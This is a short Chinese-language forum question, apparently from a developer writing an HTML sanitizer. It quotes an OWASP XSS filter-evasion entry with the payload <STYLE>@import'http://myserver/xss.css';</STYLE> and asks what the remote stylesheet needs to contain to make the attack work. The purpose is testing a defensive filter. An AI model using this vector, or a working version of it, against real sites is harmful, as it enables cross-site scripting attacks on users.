我正在尝试创建一个消毒功能,它差不多完成了,有一个让我困扰的攻击(来自https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_2):
远程样式表第2部分
这与上面的工作方式相同,但使用STYLE标记而不是LINK标记。该向量的略有变化用于破解谷歌桌面。作为旁注,如果在向量之后有HTML,则可以删除end / STYLE标记以关闭它。如果您在跨站点脚本攻击中不能使用等号或斜杠,这在现实世界中至少出现过一次,那么这非常有用:
<STYLE>@import'http://myserver/xss.css';</STYLE>
问题是我应该在xss.css文件中放入什么才能使用它?我试过提醒('xss'),然后是<script>alert('xss')</script>,但都没有效果。